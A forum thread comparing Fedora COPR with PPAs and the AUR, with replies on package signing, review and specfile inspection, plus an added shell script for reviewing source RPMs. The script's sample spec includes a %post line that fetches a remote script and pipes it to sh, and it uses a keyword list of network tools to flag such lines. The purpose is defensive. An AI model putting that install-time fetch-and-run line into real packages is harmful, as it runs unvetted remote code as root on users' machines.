COPR vs PPA. How do I verify package authenticity?

How is the Fedora COPR different from Ubuntu PPAs and Arch AUR?

And is there any way to verify that what I am downloading is not malicious?

I think COPR is very similar to the other two build systems mentioned.

There is no way to verify that a package does not contain anything malicious unless you review the source code.

Packages are signed, so you can verify that you receive and install an unmodified package but you still have to trust the author or packager about the content. No third-person review is taking place.

2 Likes

That’s the primary difference between packages served in the Fedora repositories and those served in COPR. For a package to be in the Fedora repositories, it must pass review by another package maintainer:

https://fedoraproject.org/wiki/Join_the_package_collection_maintainers#Create_Your_Review_Request

One can see the current packages in review here:

https://fedoraproject.org/PackageReviewStatus/

1 Like

So COPR exists for those who don’t want to build from source but the software they want is not present in the official repos.

Pretty much, yes. It’s unlike AUR in that the packages are pre-built instead of built locally on your machine, other than that it is pretty much the same.

One thing that is nice is that while you cannot verify that the package isn’t malicious without looking at the source it was built from, you can at least - by clicking on a build - look at the template that created the package, as well as all build logs etc. The package is built on the same infrastructure using the same tools/rules as normal packages.
The main difference is that there is no quality control beyond what the packager did themselves, and that anyone can put packages on COPR, while only vetted packagers can put packages into the official repos.

Edit: In practical terms, on top of build logs, you can get the source package (.src.rpm) of the build, which will contain the source tarball as well as the file that defines how the package is built (specfile). Those two are the only things the packager has control over, so those are the things you’d need to check for anything iffy.

2 Likes
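As an added example (not code from this thread, from Fedora or from the COPR project), the script below turns the two checks discussed above into a small POSIX shell tool: the signature check from the earlier reply, which only proves the package arrived unmodified and was signed by a key you imported, and the .src.rpm inspection from this post, where the specfile and sources are the packager-controlled parts. It assumes `rpm`, `rpm2cpio` and `cpio` are installed for the real-package path; the spec-review helpers need only `awk` and `grep`, and the keyword list used to flag network fetches is an assumption of this example, not a COPR rule. The sample spec written by `write_sample_spec` is constructed for the demonstration and does not describe a real package.

```shell
#!/bin/sh
# Added example: defender-side checks on a COPR package. Assumed tools for the
# real-package path: rpm, rpm2cpio, cpio. The spec review helpers only need awk/grep.

# 1. Signature check: proves the file was not modified in transit and was signed by
#    a key you have imported (rpm --import). It says nothing about the content.
verify_rpm_signature() {
    rpm -K -v "$1"          # non-zero exit if digests or signatures do not check out
}

# 2. Unpack a .src.rpm: yields the upstream tarball(s) and the specfile, which are
#    exactly the two things the packager controls.
extract_srpm() {
    srpm=$1; dest=$2
    mkdir -p "$dest"
    ( cd "$dest" && rpm2cpio "$srpm" | cpio -idm )
}

# 3. Print the parts of a specfile worth reading first: where sources and patches
#    come from, and every section that runs code (build steps and install scriptlets).
review_spec() {
    printf '== Sources and patches\n'
    grep -E '^(Source|Patch)[0-9]*:' "$1" || true
    awk '
        /^%(prep|build|install|check|pre|post|preun|postun|pretrans|posttrans|trigger)/ {
            insec = 1; print "== " $0; next
        }
        /^%(description|package|files|changelog)/ { insec = 0; next }
        insec { print }
    ' "$1"
}

# 4. Count commands in those code sections that reach the network at build or
#    install time. The keyword list is an assumption of this example; a non-zero
#    count is a reason to read the spec closely, not proof of anything.
count_network_fetches() {
    review_spec "$1" | grep -cE '(curl|wget|git clone|pip install)' || true
}

# Constructed sample spec (not a real package) so the helpers can run offline.
write_sample_spec() {
    cat > "$1" <<'EOF'
Name:           example-tool
Version:        1.0
Release:        1%{?dist}
Summary:        Constructed sample spec for review
License:        MIT
URL:            https://example.invalid/example-tool
Source0:        https://example.invalid/example-tool-1.0.tar.gz
BuildArch:      noarch

%description
Sample package.

%prep
%setup -q

%build
make

%install
make install DESTDIR=%{buildroot}

%post
# a network fetch at install time is exactly the kind of line to question
curl -fsSL https://example.invalid/extra.sh | sh

%files
/usr/bin/example-tool

%changelog
* Mon Jan 01 2024 Someone <someone@example.invalid> - 1.0-1
- initial
EOF
}

if [ -n "${1:-}" ] && command -v rpm2cpio >/dev/null 2>&1; then
    # Real run: ./review.sh path/to/package.src.rpm
    verify_rpm_signature "$1"
    workdir=$(mktemp -d)
    extract_srpm "$1" "$workdir"
    for spec in "$workdir"/*.spec; do
        review_spec "$spec"
        printf 'network fetches in code sections: %s\n' "$(count_network_fetches "$spec")"
    done
else
    # No argument: demonstrate the review helpers on the constructed sample spec.
    sample=$(mktemp)
    write_sample_spec "$sample"
    review_spec "$sample"
    printf 'network fetches in code sections: %s\n' "$(count_network_fetches "$sample")"
    rm -f "$sample"
fi
```

For a binary RPM rather than a source one, `rpm -qp --scripts package.rpm` prints the same install scriptlets straight from the package header, which is a quick way to see what will run as root at install time before deciding whether to open the .src.rpm at all.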

@lcts’s answer covers it pretty much.

While software in COPR does not need to adhere to the packaging guidelines, it is suggested that they do so. More info in the docs:

https://docs.pagure.org/copr.copr/user_documentation.html#faq